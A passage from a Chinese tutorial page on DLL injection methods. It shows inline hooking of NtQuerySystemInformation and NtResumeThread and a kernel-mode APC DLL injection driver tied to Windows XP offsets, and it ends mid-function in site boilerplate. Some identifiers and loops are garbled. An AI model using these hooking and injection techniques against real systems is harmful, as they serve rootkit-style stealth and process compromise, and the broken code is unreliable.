EnterCriticalSection(&cs);
_asm {
lea edi,g_OldNtQuerySystemInformation mov esi,g_pfNtQuerySystemInformation cld
mov ecx,5 rep movsb
lea edi,g_OldNtResumeThread mov esi,g_pfNtResumeThread cld
mov ecx,5 rep movsb }
g_NewNtQuerySystemInformation[0] = 0xe9; g_NewNtResumeThread[0] = 0xe9; _asm {
lea eax, NewNtQuerySystemInformation mov ebx, g_pfNtQuerySystemInformation sub eax, ebx sub eax, 5
mov dword ptr [g_NewNtQuerySystemInformation + 1], eax lea eax, NewNtResumeThread mov ebx, g_pfNtResumeThread sub eax, ebx sub eax, 5
mov dword ptr [g_NewNtResumeThread + 1], eax } .......
LeaveCriticalSection(&cs);
g_bHook = TRUE; }
// 还原被修改的代码 void WINAPI HookOff() {
......
g_bHook = FALSE; }
第十一种方法:
利用ring0 APC注入dll
/*注:拿APC启动进程的代码改下...本代码用VC6.0+ XP DDK编译通过...在XP SP2运行成功.....
里面用到了一些硬编码..比如直接用ETHREAD的偏移值... __asm
{ //我的机器的loadlibrary的地址一提
mov eax,0x7C801d77 -----这个地址你自己改下 或者自己分析kernel32.dll EAT
注意假使你不用硬编码....g_addr是loadlibrary的地址...但不能直接 mov eax,g_aadr
因为这时候我们的mov eax,g_aadr
已经运行在用户态...而g_aadr是一个内核变量...用户程序是访问不了内核空间的...所以应该自
己计算机mov eax,g_aadr这条指令的偏移...在驱动里copy下..替换下就OK */
//基本思路就是在目标进程的上下文中让其调用loadlibrary加载我们的dll //copy much code
////////////////////////////////////////////////////////////////////////////////// 完整代码以重新编辑....也改了下...防止干坏事
#include
#define MAX_PID 65535
/////////////////////////////////////////////////////////////////////////////////////
//////////////////// NTSTATUS
InstallUserModeApc(LPSTR DllFullPath, ULONG pTargetThread, ULONG pTargetProcess); void ApcCreateProcessEnd();
void ApcCreateProcess(PVOID NormalContext, PVOID SystemArgument1, PVOID
SystemArgument2);
typedef enum {
OriginalApcEnvironment, AttachedApcEnvironment, CurrentApcEnvironment } KAPC_ENVIRONMENT;
typedef struct _KAPC_STATE {
LIST_ENTRY ApcListHead[MaximumMode]; struct _KPROCESS *Process; BOOLEAN KernelApcInProgress; BOOLEAN KernelApcPending; BOOLEAN UserApcPending;
} KAPC_STATE, *PKAPC_STATE, *PRKAPC_STATE;
VOID
KeInitializeApc ( PKAPC Apc,
PETHREAD Thread,
KAPC_ENVIRONMENT Environment, PKKERNEL_ROUTINE KernelRoutine,
PKRUNDOWN_ROUTINE RundownRoutine, PKNORMAL_ROUTINE NormalRoutine, KPROCESSOR_MODE ProcessorMode, PVOID NormalContext );
BOOLEAN
KeInsertQueueApc ( PKAPC Apc,
PVOID SystemArgument1, PVOID SystemArgument2, KPRIORITY Increment );
NTSTATUS
PsLookupProces**yProcessId( __in HANDLE ProcessId,
__deref_out PEPROCESS *Process );
UCHAR *
PsGetProcessImageFileName( __in PEPROCESS Process
); VOID
KeStackAttachProcess ( IN PVOID Process,
OUT PRKAPC_STATE ApcState ); VOID
KeUnstackDetachProcess(
IN PRKAPC_STATE ApcState );
/////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////
//===================================================================================
====//
// InjectDll遍历进程,得到根据名字找到我们想要注入的进程,得到进程后遍历线程.找受信??线
程序//
//注意这里ETHREAD我是用XP..在其他操作系统可能一些偏移不同 //
//===================================================================================
===//
void InjectDll(LPSTR DllFullPath,LPSTR ProcessName) {
//全部定义为ULONG类型 ULONG pTargetProcess; ULONG pTargetThread; ULONG pNotAlertableThread; ULONG pSystemProcess; ULONG pTempThread;
ULONG pNextEntry, pListHead, pThNextEntry,pThListHead; ULONG pid;
PEPROCESS EProcess; NTSTATUS status;
for(pid=0; pid status = PsLookupProces**yProcessId((HANDLE)pid,&EProcess); if((NT_SUCCESS(status))) { if(_stricmp(PsGetProcessImageFileName(EProcess),ProcessName)==0) { pSystemProcess=(ULONG)EProcess; pTargetProcess =pSystemProcess; pTargetThread = pNotAlertableThread = 0; pThListHead = pSystemProcess+0x50; pThNextEntry=*(ULONG *)pThListHead; while(pThNextEntry != pThListHead) { pTempThread =pThNextEntry-0x1b0; //ETHREAD if(*(char *)(pTempThread+0x164)) //受信?? { pTargetThread =pTempThread; break; } else { pNotAlertableThread =pTempThread; } pThNextEntry = *(ULONG *)pThNextEntry; } break; } } } if(!pTargetProcess) return; if(!pTargetThread) pTargetThread = pNotAlertableThread; if(pTargetThread) { 搜索“diyifanwen.net”或“第一范文网”即可找到本站免费阅读全部范文。收藏本站方便下次阅读,第一范文网,提供最新小学教育DLL的11种注入方法 (5)全文阅读和word下载服务。
相关推荐:
淡若清风